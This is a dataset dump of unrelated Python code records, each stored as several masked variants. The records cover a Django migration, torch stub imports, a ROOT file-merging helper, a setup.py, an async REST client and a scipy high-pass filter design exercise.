"step-4": "from django.db import migrations, models\nimport django.db.models.deletion\nimport modelcluster.fields\n\n\nclass Migration(migrations.Migration):\n dependencies = [('users', '0003_delete_userprofile')]\n operations = [migrations.CreateModel(name='Subscription', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('email', models.EmailField(max_length=\n 255)), ('subscribe_to', models.CharField(choices=[('jobs', 'Jobs'),\n ('posts', 'Posts'), ('newsletter', 'Newsletter')], max_length=100)),\n ('department', modelcluster.fields.ParentalKey(null=True, on_delete\n =django.db.models.deletion.CASCADE, related_name=\n 'department_subscriptions', to='users.Department'))], options={\n 'verbose_name': 'Subscription', 'verbose_name_plural':\n 'Subscriptions'})]\n",
"step-5": "# Generated by Django 2.2.2 on 2019-07-17 10:02\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport modelcluster.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0003_delete_userprofile'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Subscription',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('email', models.EmailField(max_length=255)),\n ('subscribe_to', models.CharField(choices=[('jobs', 'Jobs'), ('posts', 'Posts'), ('newsletter', 'Newsletter')], max_length=100)),\n ('department', modelcluster.fields.ParentalKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='department_subscriptions', to='users.Department')),\n ],\n options={\n 'verbose_name': 'Subscription',\n 'verbose_name_plural': 'Subscriptions',\n },\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Stubs for torch.nn.utils (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from .clip_grad import clip_grad_norm, clip_grad_norm_, clip_grad_value_
from .convert_parameters import parameters_to_vector, vector_to_parameters
from .spectral_norm import remove_spectral_norm, spectral_norm
from .weight_norm import remove_weight_norm, weight_norm
|
normal
|
{
"blob_id": "5d9ace3b6c5b4e24fc3b20b5e5640f2fcdb252bb",
"index": 9292,
"step-1": "<mask token>\n",
"step-2": "from .clip_grad import clip_grad_norm, clip_grad_norm_, clip_grad_value_\nfrom .convert_parameters import parameters_to_vector, vector_to_parameters\nfrom .spectral_norm import remove_spectral_norm, spectral_norm\nfrom .weight_norm import remove_weight_norm, weight_norm\n",
"step-3": "# Stubs for torch.nn.utils (Python 3)\n#\n# NOTE: This dynamically typed stub was automatically generated by stubgen.\n\nfrom .clip_grad import clip_grad_norm, clip_grad_norm_, clip_grad_value_\nfrom .convert_parameters import parameters_to_vector, vector_to_parameters\nfrom .spectral_norm import remove_spectral_norm, spectral_norm\nfrom .weight_norm import remove_weight_norm, weight_norm\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#!/usr/bin/env python
from ROOT import TFileMerger
import subprocess
def MergeFiles(output, fileList, skipList=[], acceptList=[], n=20):
merger = TFileMerger(False)
merger.OutputFile(output);
merger.SetMaxOpenedFiles(n);
print "Total number of files is {0}".format(len(fileList))
for fileName in fileList:
print "Adding file {0}".format(fileName)
merger.AddFile(fileName)
mode = TFileMerger.kAllIncremental
if len(skipList) > 0:
mode = mode | TFileMerger.kSkipListed
if (len(acceptList) > 0):
print("Accept list is being ignored!!!")
for skipObject in skipList:
merger.AddObjectNames(skipObject)
elif len(acceptList) > 0:
mode = mode | TFileMerger.kAcceptListed
for acceptObject in acceptList:
merger.AddObjectNames(acceptObject)
merger.PrintFiles("");
r = merger.PartialMerge(mode);
if not r:
print "Merge error!"
return r
def MergeFilesHadd(output, fileList, n=20):
cmd = ["hadd", "-n", str(n), output]
cmd.extend(fileList)
subprocess.call(cmd)
|
normal
|
{
"blob_id": "95f7710fb0137617025819b6240312ce02915328",
"index": 173,
"step-1": "#!/usr/bin/env python\n\nfrom ROOT import TFileMerger\nimport subprocess\n\ndef MergeFiles(output, fileList, skipList=[], acceptList=[], n=20):\n merger = TFileMerger(False)\n merger.OutputFile(output);\n merger.SetMaxOpenedFiles(n);\n\n print \"Total number of files is {0}\".format(len(fileList))\n \n for fileName in fileList:\n print \"Adding file {0}\".format(fileName)\n merger.AddFile(fileName)\n \n mode = TFileMerger.kAllIncremental\n\n if len(skipList) > 0:\n mode = mode | TFileMerger.kSkipListed\n if (len(acceptList) > 0):\n print(\"Accept list is being ignored!!!\")\n for skipObject in skipList:\n merger.AddObjectNames(skipObject)\n \n elif len(acceptList) > 0:\n mode = mode | TFileMerger.kAcceptListed\n for acceptObject in acceptList:\n merger.AddObjectNames(acceptObject)\n \n merger.PrintFiles(\"\");\n r = merger.PartialMerge(mode);\n\n if not r:\n print \"Merge error!\"\n\n return r\n\n\ndef MergeFilesHadd(output, fileList, n=20):\n cmd = [\"hadd\", \"-n\", str(n), output]\n cmd.extend(fileList)\n \n subprocess.call(cmd)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from setuptools import setup
import sys
if not sys.version_info >= (3, 6, 0):
msg = 'Unsupported version %s' % sys.version
raise Exception(msg)
def get_version(filename):
import ast
version = None
with open(filename) as f:
for line in f:
if line.startswith('__version__'):
version = ast.parse(line).body[0].value.s
break
else:
raise ValueError('No version found in %r.' % filename)
if version is None:
raise ValueError(filename)
return version
version = get_version(filename='src/zuper_nodes/__init__.py')
line = 'z5'
setup(
name=f'zuper-nodes-{line}',
version=version,
keywords='',
package_dir={'': 'src'},
packages=[
'zuper_nodes',
'zuper_nodes_tests',
'zuper_nodes_wrapper',
'zuper_nodes_wrapper_tests',
],
install_requires=[
'compmake',
'pyparsing',
'PyContracts',
'networkx<=2.2',
'termcolor',
'zuper-ipce-z5',
'cbor2',
'base58',
],
entry_points={
'console_scripts': [
'zuper-node-identify=zuper_nodes_wrapper.identify:identify_main',
],
},
)
|
normal
|
{
"blob_id": "d3b55863c6e3a1b6cbdcec37db81ee42b769938d",
"index": 9039,
"step-1": "<mask token>\n\n\ndef get_version(filename):\n import ast\n version = None\n with open(filename) as f:\n for line in f:\n if line.startswith('__version__'):\n version = ast.parse(line).body[0].value.s\n break\n else:\n raise ValueError('No version found in %r.' % filename)\n if version is None:\n raise ValueError(filename)\n return version\n\n\n<mask token>\n",
"step-2": "<mask token>\nif not sys.version_info >= (3, 6, 0):\n msg = 'Unsupported version %s' % sys.version\n raise Exception(msg)\n\n\ndef get_version(filename):\n import ast\n version = None\n with open(filename) as f:\n for line in f:\n if line.startswith('__version__'):\n version = ast.parse(line).body[0].value.s\n break\n else:\n raise ValueError('No version found in %r.' % filename)\n if version is None:\n raise ValueError(filename)\n return version\n\n\n<mask token>\nsetup(name=f'zuper-nodes-{line}', version=version, keywords='', package_dir\n ={'': 'src'}, packages=['zuper_nodes', 'zuper_nodes_tests',\n 'zuper_nodes_wrapper', 'zuper_nodes_wrapper_tests'], install_requires=[\n 'compmake', 'pyparsing', 'PyContracts', 'networkx<=2.2', 'termcolor',\n 'zuper-ipce-z5', 'cbor2', 'base58'], entry_points={'console_scripts': [\n 'zuper-node-identify=zuper_nodes_wrapper.identify:identify_main']})\n",
"step-3": "<mask token>\nif not sys.version_info >= (3, 6, 0):\n msg = 'Unsupported version %s' % sys.version\n raise Exception(msg)\n\n\ndef get_version(filename):\n import ast\n version = None\n with open(filename) as f:\n for line in f:\n if line.startswith('__version__'):\n version = ast.parse(line).body[0].value.s\n break\n else:\n raise ValueError('No version found in %r.' % filename)\n if version is None:\n raise ValueError(filename)\n return version\n\n\nversion = get_version(filename='src/zuper_nodes/__init__.py')\nline = 'z5'\nsetup(name=f'zuper-nodes-{line}', version=version, keywords='', package_dir\n ={'': 'src'}, packages=['zuper_nodes', 'zuper_nodes_tests',\n 'zuper_nodes_wrapper', 'zuper_nodes_wrapper_tests'], install_requires=[\n 'compmake', 'pyparsing', 'PyContracts', 'networkx<=2.2', 'termcolor',\n 'zuper-ipce-z5', 'cbor2', 'base58'], entry_points={'console_scripts': [\n 'zuper-node-identify=zuper_nodes_wrapper.identify:identify_main']})\n",
"step-4": "from setuptools import setup\nimport sys\nif not sys.version_info >= (3, 6, 0):\n msg = 'Unsupported version %s' % sys.version\n raise Exception(msg)\n\n\ndef get_version(filename):\n import ast\n version = None\n with open(filename) as f:\n for line in f:\n if line.startswith('__version__'):\n version = ast.parse(line).body[0].value.s\n break\n else:\n raise ValueError('No version found in %r.' % filename)\n if version is None:\n raise ValueError(filename)\n return version\n\n\nversion = get_version(filename='src/zuper_nodes/__init__.py')\nline = 'z5'\nsetup(name=f'zuper-nodes-{line}', version=version, keywords='', package_dir\n ={'': 'src'}, packages=['zuper_nodes', 'zuper_nodes_tests',\n 'zuper_nodes_wrapper', 'zuper_nodes_wrapper_tests'], install_requires=[\n 'compmake', 'pyparsing', 'PyContracts', 'networkx<=2.2', 'termcolor',\n 'zuper-ipce-z5', 'cbor2', 'base58'], entry_points={'console_scripts': [\n 'zuper-node-identify=zuper_nodes_wrapper.identify:identify_main']})\n",
"step-5": "from setuptools import setup\n\nimport sys\n\nif not sys.version_info >= (3, 6, 0):\n msg = 'Unsupported version %s' % sys.version\n raise Exception(msg)\n\n\ndef get_version(filename):\n import ast\n version = None\n with open(filename) as f:\n for line in f:\n if line.startswith('__version__'):\n version = ast.parse(line).body[0].value.s\n break\n else:\n raise ValueError('No version found in %r.' % filename)\n if version is None:\n raise ValueError(filename)\n return version\n\n\nversion = get_version(filename='src/zuper_nodes/__init__.py')\nline = 'z5'\nsetup(\n name=f'zuper-nodes-{line}',\n version=version,\n keywords='',\n package_dir={'': 'src'},\n packages=[\n 'zuper_nodes',\n 'zuper_nodes_tests',\n 'zuper_nodes_wrapper',\n 'zuper_nodes_wrapper_tests',\n ],\n install_requires=[\n 'compmake',\n 'pyparsing',\n 'PyContracts',\n 'networkx<=2.2',\n 'termcolor',\n 'zuper-ipce-z5',\n 'cbor2',\n 'base58',\n ],\n entry_points={\n 'console_scripts': [\n 'zuper-node-identify=zuper_nodes_wrapper.identify:identify_main',\n ],\n },\n)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import erequests
from pyarc.base import RestException
class ResultWrapper(object):
def __init__(self, client, method, url):
self.client = client
self.method = method
self.url = url
self.response = None
def get(self):
if self.response is None:
self.client.wait_all_requests_completed()
if self.response.status_code >= 400:
raise RestException(self.method,
self.url,
self.response.status_code,
self.response.text)
try:
return self.response.json()
except ValueError:
return self.response.text
_METHODS = {
'get' : erequests.async.get,
'put' : erequests.async.put,
'post' : erequests.async.post,
'delete' : erequests.async.delete
}
class ERequestsClient(object):
def __init__(self, verify = None):
self.requests_to_send = []
self.results = []
self.verify = verify or False
def start_req(self, method, prepared_url, headers, body = ''):
method = method.lower()
assert method in _METHODS, "Unknown method %s" % method
future = _METHODS[method](prepared_url,
headers = headers,
data = body,
verify = self.verify)
res = ResultWrapper(self, method, prepared_url)
self.requests_to_send.append(future)
self.results.append(res)
return res
def wait_all_requests_completed(self):
if len(self.requests_to_send) == 0:
return
try:
for resp, result in zip(erequests.map(self.requests_to_send), self.results):
result.response = resp
finally:
self.requests_to_send = []
self.results = []
|
normal
|
{
"blob_id": "4d1157b307d753abea721b93779ccc989c77d8e3",
"index": 6876,
"step-1": "import erequests\nfrom pyarc.base import RestException\n\n\nclass ResultWrapper(object):\n def __init__(self, client, method, url):\n self.client = client\n self.method = method\n self.url = url\n self.response = None\n\n def get(self):\n if self.response is None:\n self.client.wait_all_requests_completed()\n if self.response.status_code >= 400:\n raise RestException(self.method,\n self.url,\n self.response.status_code,\n self.response.text)\n try:\n return self.response.json()\n except ValueError:\n return self.response.text\n\n\n_METHODS = {\n 'get' : erequests.async.get,\n 'put' : erequests.async.put,\n 'post' : erequests.async.post,\n 'delete' : erequests.async.delete\n }\n\n\nclass ERequestsClient(object):\n def __init__(self, verify = None):\n self.requests_to_send = []\n self.results = []\n self.verify = verify or False\n\n def start_req(self, method, prepared_url, headers, body = ''):\n method = method.lower()\n assert method in _METHODS, \"Unknown method %s\" % method\n\n future = _METHODS[method](prepared_url,\n headers = headers,\n data = body,\n verify = self.verify)\n res = ResultWrapper(self, method, prepared_url)\n self.requests_to_send.append(future)\n self.results.append(res)\n return res\n\n def wait_all_requests_completed(self):\n if len(self.requests_to_send) == 0:\n return\n try:\n for resp, result in zip(erequests.map(self.requests_to_send), self.results):\n result.response = resp\n finally:\n self.requests_to_send = []\n self.results = []\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def has23(nums):
this = nums[0] == 2 or nums[0] == 3
that = nums[1] == 2 or nums[1] == 3
return this or that
|
flexible
|
{
"blob_id": "174c4c1ed7f2197e012644999cf23f5e82f4b7c3",
"index": 3148,
"step-1": "<mask token>\n",
"step-2": "def has23(nums):\n this = nums[0] == 2 or nums[0] == 3\n that = nums[1] == 2 or nums[1] == 3\n return this or that\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
# -*- coding: utf-8 -*-
"""
Created on Sat May 2 21:31:37 2020
@author: Emmanuel Torres Molina
"""
"""
Ejercicio 10 del TP2 de Teoría de los Circuitos II:
Un tono de 45 KHz y 200 mV de amplitud es distorsionada por un tono de 12 KHz
y 2V de amplitud. Diseñar un filtro pasa altos que atenúe la señal
interferente, de tal forma que el remanente no sea mayor que el 2% de los 200 mV.
La ganancia en alta frecuencia deberá ser de 0 db y la máxima atenuación
en la banda de paso menor a 1 dB. Emplear la aproximación que necesite menor
número de etapas.
En este caso el Filtro está Sintetizado por un Estructura RLC Pasiva + RL Pasivo.
"""
import numpy as np
from scipy.signal import TransferFunction as transf_f
import scipy.signal as sig
from splane import bodePlot, pzmap
from matplotlib import pyplot as plt
plt.close ('all')
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# Vector Tiempo:
t0 = 0.0 # Tiempo Inicial
tf = 0.005
dt = 0.00005 # Incremento
t = np.arange (t0, tf, dt)
# ---------------------------------------------------------------------------
# Tono de Interés:
f_t = 45 * 10**3 # Frecuecia del Tono de mi Interés [Hz]
w_t = 2 * np.pi * f_t # [rad/seg]
A_t = 0.2 # Amplitud de mi Tono [V]
s_t = A_t * np.sin ( w_t * t )
# ---------------------------------------------------------------------------
# Ruido Interferente:
f_r = 12 * 10**3 # Frecuencia del Ruido Interferente [Hz]
w_r = 2 * np.pi * f_r # [rad/seg]
A_r= 2 # Amplitud del Ruido [V]
r_t = A_r * np.sin ( w_r * t )
sgnal = s_t + r_t
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# Valores de los Elementos del Circuito:
# Etapa 1: RLC Pasivo
R1 = 290
C1 = 3.5e-9
L1 = 3.5e-3
k1 = 1
# Etapa 2: RL Pasivo
R2 = 700
C2 = 3.5e-9
L2 = 1.03e-3
k2 = 1
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# Diseño del Filtro: Vamos a Realizar un Filtro High-Pass:
# Requisitos de Plantilla
alfa_max = 0.9 # Piden que sea menor a 1dB
alfa_min = 54 # el remanente no sea mayor que el 2% de los 200 mV
wp_hp = w_t
ws_hp = w_r
# Normalizo las Pulsaciones Angulares usando como norma: wp_hp
wp_hp_norm = wp_hp / wp_hp
ws_hp_norm = ws_hp / wp_hp
w0 = np.sqrt ( 1 / (L1*C1) )
# ---------------------------------------------------------------------------
# Filtro Prototipo Low-Pass: Transformación en Frecuencia: w_HP = -1 / w_LP
wp_lp_norm = abs(-1 / wp_hp_norm)
ws_lp_norm = abs(-1 / ws_hp_norm)
# Voy a Utilizar Aproximación de Chebyshev para Diseñal el Filtro:
eps = np.sqrt ( (10 **(alfa_max/10) ) - 1 )
# Orden del Filtro
N = np.arccosh ( np.sqrt ( (10**(alfa_min/10) - 1) / eps**2 ) ) / np.arccosh (ws_lp_norm)
N = np.ceil ( N ) # Redondeo para arriba
den1_lp = [1, 0.29, 1]
den2_lp = [1, 0.7, 0.29]
p1_lp = np.roots ( den1_lp )
p2_lp = np.roots ( den2_lp )
my_z_lp = np.array ([])
my_p_lp = np.concatenate ( (p1_lp, p2_lp), axis = None )
my_k_lp = 1 * 0.29
NUM, DEN = sig.zpk2tf ( my_z_lp, my_p_lp, my_k_lp )
NUM_lp, DEN_lp = sig.lp2lp ( NUM, DEN, w0 )
my_tf_lp = transf_f (NUM_lp,DEN_lp)
# ---------------------------------------------------------------------------
# Filtro Destino - Filtro High-Pass:
# Calculo W0:
NUM_hp, DEN_hp = sig.lp2hp ( NUM, DEN, w0 )
my_tf_hp = transf_f ( NUM_hp, DEN_hp )
my_z_hp, my_p_hp, my_k_hp = sig.tf2zpk (NUM_hp, DEN_hp )
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# Filtrado de la Señal:
t, s_filtrada, x = sig.lsim2 ((my_tf_hp), sgnal, t )
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# Ploteo de las Señales, Respuesta en Frecuencia, etc.
fig1, axs = plt.subplots(4,1)
axs[0].plot ( t, s_t )
axs[0].grid ('True')
axs[0].set_title ('Señal Original')
axs[0].set_ylim(-0.2,0.2)
axs[0].set_ylabel('[V]')
axs[1].plot ( t, r_t )
axs[1].grid ('True')
axs[1].set_title ('Ruido Interferente')
axs[1].set_ylabel('[V]')
axs[1].set_xlim(0)
axs[2].plot (t, s_t + r_t )
axs[2].grid ('True')
axs[2].set_title ('Señal a Filtrar')
axs[2].set_ylabel('[V]')
axs[2].set_xlim(0)
axs[3].plot (t, s_filtrada )
axs[3].grid ('True')
axs[3].set_title ( 'Señal Filtrada' )
axs[3].set_xlabel ('t[seg]')
axs[3].set_ylabel('[V]')
axs[3].set_ylim(-0.2,0.2)
axs[3].set_xlim(0)
# Respuesta en Frecuencia:
bodePlot (my_tf_lp, 'Filtro Prototipo - Low Pass')
pzmap (my_tf_lp)
bodePlot (my_tf_hp, 'Filtro Destino - High Pass')
pzmap (my_tf_hp)
|
normal
|
{
"blob_id": "dd59f3b1d8b17defe4e7f30fec594d01475319d2",
"index": 6211,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nplt.close('all')\n<mask token>\naxs[0].plot(t, s_t)\naxs[0].grid('True')\naxs[0].set_title('Señal Original')\naxs[0].set_ylim(-0.2, 0.2)\naxs[0].set_ylabel('[V]')\naxs[1].plot(t, r_t)\naxs[1].grid('True')\naxs[1].set_title('Ruido Interferente')\naxs[1].set_ylabel('[V]')\naxs[1].set_xlim(0)\naxs[2].plot(t, s_t + r_t)\naxs[2].grid('True')\naxs[2].set_title('Señal a Filtrar')\naxs[2].set_ylabel('[V]')\naxs[2].set_xlim(0)\naxs[3].plot(t, s_filtrada)\naxs[3].grid('True')\naxs[3].set_title('Señal Filtrada')\naxs[3].set_xlabel('t[seg]')\naxs[3].set_ylabel('[V]')\naxs[3].set_ylim(-0.2, 0.2)\naxs[3].set_xlim(0)\nbodePlot(my_tf_lp, 'Filtro Prototipo - Low Pass')\npzmap(my_tf_lp)\nbodePlot(my_tf_hp, 'Filtro Destino - High Pass')\npzmap(my_tf_hp)\n",
"step-3": "<mask token>\nplt.close('all')\nt0 = 0.0\ntf = 0.005\ndt = 5e-05\nt = np.arange(t0, tf, dt)\nf_t = 45 * 10 ** 3\nw_t = 2 * np.pi * f_t\nA_t = 0.2\ns_t = A_t * np.sin(w_t * t)\nf_r = 12 * 10 ** 3\nw_r = 2 * np.pi * f_r\nA_r = 2\nr_t = A_r * np.sin(w_r * t)\nsgnal = s_t + r_t\nR1 = 290\nC1 = 3.5e-09\nL1 = 0.0035\nk1 = 1\nR2 = 700\nC2 = 3.5e-09\nL2 = 0.00103\nk2 = 1\nalfa_max = 0.9\nalfa_min = 54\nwp_hp = w_t\nws_hp = w_r\nwp_hp_norm = wp_hp / wp_hp\nws_hp_norm = ws_hp / wp_hp\nw0 = np.sqrt(1 / (L1 * C1))\nwp_lp_norm = abs(-1 / wp_hp_norm)\nws_lp_norm = abs(-1 / ws_hp_norm)\neps = np.sqrt(10 ** (alfa_max / 10) - 1)\nN = np.arccosh(np.sqrt((10 ** (alfa_min / 10) - 1) / eps ** 2)) / np.arccosh(\n ws_lp_norm)\nN = np.ceil(N)\nden1_lp = [1, 0.29, 1]\nden2_lp = [1, 0.7, 0.29]\np1_lp = np.roots(den1_lp)\np2_lp = np.roots(den2_lp)\nmy_z_lp = np.array([])\nmy_p_lp = np.concatenate((p1_lp, p2_lp), axis=None)\nmy_k_lp = 1 * 0.29\nNUM, DEN = sig.zpk2tf(my_z_lp, my_p_lp, my_k_lp)\nNUM_lp, DEN_lp = sig.lp2lp(NUM, DEN, w0)\nmy_tf_lp = transf_f(NUM_lp, DEN_lp)\nNUM_hp, DEN_hp = sig.lp2hp(NUM, DEN, w0)\nmy_tf_hp = transf_f(NUM_hp, DEN_hp)\nmy_z_hp, my_p_hp, my_k_hp = sig.tf2zpk(NUM_hp, DEN_hp)\nt, s_filtrada, x = sig.lsim2(my_tf_hp, sgnal, t)\nfig1, axs = plt.subplots(4, 1)\naxs[0].plot(t, s_t)\naxs[0].grid('True')\naxs[0].set_title('Señal Original')\naxs[0].set_ylim(-0.2, 0.2)\naxs[0].set_ylabel('[V]')\naxs[1].plot(t, r_t)\naxs[1].grid('True')\naxs[1].set_title('Ruido Interferente')\naxs[1].set_ylabel('[V]')\naxs[1].set_xlim(0)\naxs[2].plot(t, s_t + r_t)\naxs[2].grid('True')\naxs[2].set_title('Señal a Filtrar')\naxs[2].set_ylabel('[V]')\naxs[2].set_xlim(0)\naxs[3].plot(t, s_filtrada)\naxs[3].grid('True')\naxs[3].set_title('Señal Filtrada')\naxs[3].set_xlabel('t[seg]')\naxs[3].set_ylabel('[V]')\naxs[3].set_ylim(-0.2, 0.2)\naxs[3].set_xlim(0)\nbodePlot(my_tf_lp, 'Filtro Prototipo - Low Pass')\npzmap(my_tf_lp)\nbodePlot(my_tf_hp, 'Filtro Destino - High 
Pass')\npzmap(my_tf_hp)\n",
"step-4": "<mask token>\nimport numpy as np\nfrom scipy.signal import TransferFunction as transf_f\nimport scipy.signal as sig\nfrom splane import bodePlot, pzmap\nfrom matplotlib import pyplot as plt\nplt.close('all')\nt0 = 0.0\ntf = 0.005\ndt = 5e-05\nt = np.arange(t0, tf, dt)\nf_t = 45 * 10 ** 3\nw_t = 2 * np.pi * f_t\nA_t = 0.2\ns_t = A_t * np.sin(w_t * t)\nf_r = 12 * 10 ** 3\nw_r = 2 * np.pi * f_r\nA_r = 2\nr_t = A_r * np.sin(w_r * t)\nsgnal = s_t + r_t\nR1 = 290\nC1 = 3.5e-09\nL1 = 0.0035\nk1 = 1\nR2 = 700\nC2 = 3.5e-09\nL2 = 0.00103\nk2 = 1\nalfa_max = 0.9\nalfa_min = 54\nwp_hp = w_t\nws_hp = w_r\nwp_hp_norm = wp_hp / wp_hp\nws_hp_norm = ws_hp / wp_hp\nw0 = np.sqrt(1 / (L1 * C1))\nwp_lp_norm = abs(-1 / wp_hp_norm)\nws_lp_norm = abs(-1 / ws_hp_norm)\neps = np.sqrt(10 ** (alfa_max / 10) - 1)\nN = np.arccosh(np.sqrt((10 ** (alfa_min / 10) - 1) / eps ** 2)) / np.arccosh(\n ws_lp_norm)\nN = np.ceil(N)\nden1_lp = [1, 0.29, 1]\nden2_lp = [1, 0.7, 0.29]\np1_lp = np.roots(den1_lp)\np2_lp = np.roots(den2_lp)\nmy_z_lp = np.array([])\nmy_p_lp = np.concatenate((p1_lp, p2_lp), axis=None)\nmy_k_lp = 1 * 0.29\nNUM, DEN = sig.zpk2tf(my_z_lp, my_p_lp, my_k_lp)\nNUM_lp, DEN_lp = sig.lp2lp(NUM, DEN, w0)\nmy_tf_lp = transf_f(NUM_lp, DEN_lp)\nNUM_hp, DEN_hp = sig.lp2hp(NUM, DEN, w0)\nmy_tf_hp = transf_f(NUM_hp, DEN_hp)\nmy_z_hp, my_p_hp, my_k_hp = sig.tf2zpk(NUM_hp, DEN_hp)\nt, s_filtrada, x = sig.lsim2(my_tf_hp, sgnal, t)\nfig1, axs = plt.subplots(4, 1)\naxs[0].plot(t, s_t)\naxs[0].grid('True')\naxs[0].set_title('Señal Original')\naxs[0].set_ylim(-0.2, 0.2)\naxs[0].set_ylabel('[V]')\naxs[1].plot(t, r_t)\naxs[1].grid('True')\naxs[1].set_title('Ruido Interferente')\naxs[1].set_ylabel('[V]')\naxs[1].set_xlim(0)\naxs[2].plot(t, s_t + r_t)\naxs[2].grid('True')\naxs[2].set_title('Señal a Filtrar')\naxs[2].set_ylabel('[V]')\naxs[2].set_xlim(0)\naxs[3].plot(t, s_filtrada)\naxs[3].grid('True')\naxs[3].set_title('Señal 
Filtrada')\naxs[3].set_xlabel('t[seg]')\naxs[3].set_ylabel('[V]')\naxs[3].set_ylim(-0.2, 0.2)\naxs[3].set_xlim(0)\nbodePlot(my_tf_lp, 'Filtro Prototipo - Low Pass')\npzmap(my_tf_lp)\nbodePlot(my_tf_hp, 'Filtro Destino - High Pass')\npzmap(my_tf_hp)\n",
"step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 2 21:31:37 2020\r\n\r\n@author: Emmanuel Torres Molina\r\n\"\"\"\r\n\r\n\"\"\"\r\nEjercicio 10 del TP2 de Teoría de los Circuitos II:\r\nUn tono de 45 KHz y 200 mV de amplitud es distorsionada por un tono de 12 KHz \r\ny 2V de amplitud. Diseñar un filtro pasa altos que atenúe la señal\r\ninterferente, de tal forma que el remanente no sea mayor que el 2% de los 200 mV.\r\nLa ganancia en alta frecuencia deberá ser de 0 db y la máxima atenuación\r\nen la banda de paso menor a 1 dB. Emplear la aproximación que necesite menor \r\nnúmero de etapas.\r\nEn este caso el Filtro está Sintetizado por un Estructura RLC Pasiva + RL Pasivo.\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom scipy.signal import TransferFunction as transf_f\r\nimport scipy.signal as sig\r\nfrom splane import bodePlot, pzmap\r\nfrom matplotlib import pyplot as plt\r\n\r\nplt.close ('all')\r\n\r\n# ---------------------------------------------------------------------------\r\n# ---------------------------------------------------------------------------\r\n\r\n# Vector Tiempo:\r\nt0 = 0.0 # Tiempo Inicial\r\ntf = 0.005\r\ndt = 0.00005 # Incremento\r\nt = np.arange (t0, tf, dt)\r\n\r\n# ---------------------------------------------------------------------------\r\n\r\n# Tono de Interés:\r\n\r\nf_t = 45 * 10**3 # Frecuecia del Tono de mi Interés [Hz]\r\nw_t = 2 * np.pi * f_t # [rad/seg]\r\nA_t = 0.2 # Amplitud de mi Tono [V]\r\n\r\ns_t = A_t * np.sin ( w_t * t )\r\n\r\n# ---------------------------------------------------------------------------\r\n\r\n# Ruido Interferente:\r\n\r\nf_r = 12 * 10**3 # Frecuencia del Ruido Interferente [Hz]\r\nw_r = 2 * np.pi * f_r # [rad/seg]\r\nA_r= 2 # Amplitud del Ruido [V]\r\n\r\nr_t = A_r * np.sin ( w_r * t )\r\n\r\nsgnal = s_t + r_t\r\n\r\n# ---------------------------------------------------------------------------\r\n# ---------------------------------------------------------------------------\r\n\r\n# 
Valores de los Elementos del Circuito:\r\n \r\n# Etapa 1: RLC Pasivo\r\nR1 = 290\r\nC1 = 3.5e-9\r\nL1 = 3.5e-3\r\nk1 = 1\r\n\r\n# Etapa 2: RL Pasivo\r\nR2 = 700\r\nC2 = 3.5e-9\r\nL2 = 1.03e-3\r\nk2 = 1\r\n\r\n\r\n# ---------------------------------------------------------------------------\r\n# ---------------------------------------------------------------------------\r\n\r\n# Diseño del Filtro: Vamos a Realizar un Filtro High-Pass:\r\n \r\n# Requisitos de Plantilla\r\nalfa_max = 0.9 # Piden que sea menor a 1dB\r\nalfa_min = 54 # el remanente no sea mayor que el 2% de los 200 mV\r\nwp_hp = w_t\r\nws_hp = w_r\r\n\r\n# Normalizo las Pulsaciones Angulares usando como norma: wp_hp\r\nwp_hp_norm = wp_hp / wp_hp\r\nws_hp_norm = ws_hp / wp_hp\r\n\r\nw0 = np.sqrt ( 1 / (L1*C1) )\r\n\r\n# ---------------------------------------------------------------------------\r\n\r\n# Filtro Prototipo Low-Pass: Transformación en Frecuencia: w_HP = -1 / w_LP\r\nwp_lp_norm = abs(-1 / wp_hp_norm)\r\nws_lp_norm = abs(-1 / ws_hp_norm)\r\n\r\n\r\n# Voy a Utilizar Aproximación de Chebyshev para Diseñal el Filtro:\r\n\r\neps = np.sqrt ( (10 **(alfa_max/10) ) - 1 )\r\n\r\n# Orden del Filtro\r\nN = np.arccosh ( np.sqrt ( (10**(alfa_min/10) - 1) / eps**2 ) ) / np.arccosh (ws_lp_norm)\r\nN = np.ceil ( N ) # Redondeo para arriba\r\n\r\nden1_lp = [1, 0.29, 1]\r\nden2_lp = [1, 0.7, 0.29]\r\n\r\np1_lp = np.roots ( den1_lp )\r\np2_lp = np.roots ( den2_lp )\r\n\r\nmy_z_lp = np.array ([])\r\nmy_p_lp = np.concatenate ( (p1_lp, p2_lp), axis = None )\r\nmy_k_lp = 1 * 0.29\r\n\r\nNUM, DEN = sig.zpk2tf ( my_z_lp, my_p_lp, my_k_lp )\r\nNUM_lp, DEN_lp = sig.lp2lp ( NUM, DEN, w0 )\r\n\r\nmy_tf_lp = transf_f (NUM_lp,DEN_lp)\r\n\r\n# ---------------------------------------------------------------------------\r\n\r\n# Filtro Destino - Filtro High-Pass:\r\n \r\n# Calculo W0:\r\n\r\nNUM_hp, DEN_hp = sig.lp2hp ( NUM, DEN, w0 )\r\n\r\nmy_tf_hp = transf_f ( NUM_hp, DEN_hp )\r\n\r\nmy_z_hp, 